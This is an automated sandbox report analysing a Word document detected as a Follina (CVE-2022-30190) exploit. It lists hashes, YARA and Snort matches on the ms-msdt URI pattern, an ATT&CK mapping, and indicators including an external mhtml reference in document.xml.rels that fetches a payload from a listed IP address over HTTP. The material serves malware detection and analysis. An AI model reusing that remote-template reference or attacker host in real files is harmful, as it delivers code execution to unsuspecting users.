Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc1712.docx

Overview

General Information

Sample Name:doc1712.docx
Analysis ID:640804
MD5:7a91b01a037ccbfe6589161643d0a65a
SHA1:53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256:f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
Infos:

Detection

Follina CVE-2022-30190
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1204 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
  • 0x3ca7:$re1: location.href = "ms-msdt:
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries
        No Sigma rule has matched
        Timestamp:45.32.185.177192.168.2.2280491762036726 06/07/22-17:33:41.296228
        SID:2036726
        Source Port:80
        Destination Port:49176
        Protocol:TCP
        Classtype:Attempted User Privilege Gain

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: doc1712.docxVirustotal: Detection: 23%Perma Link

        Exploits

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.32.185.177:80
        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 45.32.185.177:80

        Networking

        barindex
        Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 45.32.185.177:80 -> 192.168.2.22:49176
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drString found in binary or memory: http://45.32.185
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drString found in binary or memory: http://45.32.185.177/123.RES
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drString found in binary or memory: http://45.32.185.177/123.RESyX
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drString found in binary or memory: http://45.32.185.177:80/123.RES
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FB641AE-A3C8-41BE-B49C-07E97C275C10}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive
        Source: dump.pcap, type: PCAPMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: doc1712.docxVirustotal: Detection: 23%
        Source: doc1712.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc1712.docx
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$oc1712.docxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR625A.tmpJump to behavior
        Source: classification engineClassification label: mal68.expl.evad.winDOCX@1/18@0/1
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drOLE document summary: title field not present or empty
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drOLE document summary: author field not present or empty
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drOLE document summary: edited time not present or 0
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: ~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drInitial sample: OLE indicators vbamacros = False

        Persistence and Installation Behavior

        barindex
        Source: document.xml.relsExtracted files from sample: mhtml:http://45.32.185.177:80/123.res!http://45.32.185.177:80/123.res
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2
        Exploitation for Client Execution
        Path InterceptionPath Interception1
        Masquerading
        OS Credential Dumping1
        File and Directory Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Non-Application Layer Protocol
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
        Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Ingress Tool Transfer
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        doc1712.docx23%VirustotalBrowse
        doc1712.docx11%MetadefenderBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://45.32.1850%Avira URL Cloudsafe
        http://45.32.185.177/123.RESyX0%Avira URL Cloudsafe
        http://45.32.185.177/123.RES0%Avira URL Cloudsafe
        http://45.32.185.177:80/123.RES0%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://45.32.185.177/123.REStrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://45.32.185~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drtrue
        • Avira URL Cloud: safe
        low
        http://45.32.185.177/123.RESyX~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://45.32.185.177:80/123.RES~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp.0.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        45.32.185.177
        unknownUnited States
        20473AS-CHOOPAUStrue
        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:640804
        Start date and time: 07/06/202217:32:332022-06-07 17:32:33 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 17s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:doc1712.docx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal68.expl.evad.winDOCX@1/18@0/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.2866751271712012
        Encrypted:false
        SSDEEP:48:I39dFlkRBwRiSdXfthv4qx3qF5QJNGs0lNo21rSTrwjGmH:K7fkLwMShf/3oF5MGsGo25srwjGmH
        MD5:205378DA7DCF371A43C479B7B0F9A2AD
        SHA1:E00F4D3429165C950A6FCA02AC85B4EE4BE79F86
        SHA-256:A04716B070A827159831E3AD865F6A62B2466F941722B54ED2862A1FD7883A3C
        SHA-512:695EEEA6F4FA6449AD2BD822499C0698729641C9489CA2F3901DCE51F8A2516F3C1198BF958740D8B3A6D6AB0A61ABBC6E5D0E857DFD06C723DFEECEF2ED1BCC
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z;'wu_.B........S,...X.F...Fa.q............................#.b.%r.I.....)...............9.B..}.....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.6722944138308831
        Encrypted:false
        SSDEEP:96:KTCyPQuvtjXLi5CpoGCd1GKGXVMZCBIEMLW/LtWLt:APxv5i5C+Ga1NbsLo8tit
        MD5:0619296DF6C45C7BE46A7252C333B2C2
        SHA1:A43D8FF16A461B32B6A7F10B8B5A63F609C35427
        SHA-256:016831A58683C476F54FAEA19E0308406037953FB098236DD861105721775B29
        SHA-512:D30A9B621C9BADEC6B59F7A9A731DC9C946FE500D8AD0CA2DA13E8EB509E790C8FFE4121F17A5700CB3C3DE871F4244CC6E174B0063D73E42F827A16465D9853
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.h..s@2N..t...S,...X.F...Fa.q.............................T..:i.N....t.9..........C....J...m..j..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.8757507299451563
        Encrypted:false
        SSDEEP:3:yVlgsRlzsmlwr7Kl4WRGKSWWP3ZnNc+YUnUYDZ276:yPblzHMGSfpO+YUBt22
        MD5:C14E09D3EC890E7ED1042FB5E67173E4
        SHA1:192CBAE659A8861394BE1583C410C1AF900C503C
        SHA-256:FA11FB46BC064933EBF6F226409F02F62AB09EAF92099BF4C6C08AA33921F326
        SHA-512:C67243C05CAE05FA67259DA5E41457B49CB363AD5BE650D4186B9405FE05FDE83EDF35819EA3A6A8C2A0700459D6031C839475CCF0514A8794AE5D642AB1F9B2
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.2.1.C.7.5.F.A.3.-.D.5.9.D.-.4.9.1.6.-.8.7.7.7.-.2.F.8.D.F.8.9.A.7.9.8.9.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.2880583450358858
        Encrypted:false
        SSDEEP:48:I3IoHRRBTZBA6TdqEz6uVpWiK7IxgeZGett8fhrUMzfKqDcDfH:K1LTZTPOs3ZGett8FUMGhH
        MD5:9E46BE96F855416E452AF830BDB02202
        SHA1:14E4A4E600D7C8910070ECA1F06DD5C4356CA7C7
        SHA-256:3E0056641E7814076CC40F431D5BAF1A69ACCCD583F4898A4E08173E08F9CD7C
        SHA-512:3DF1F27301A68977BED559D5C45202ACF8C49ED24D3724A97E3704BBA37011497DCF1EEAE6210CC4E6C9E3C67F5DF3918C59A8C9B54BE77F8B7BC79DDED0DCC2
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.g@...cJ.......GS,...X.F...Fa.q.............................k16.dyD...l.M.Y...........Rs.WC.....^...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
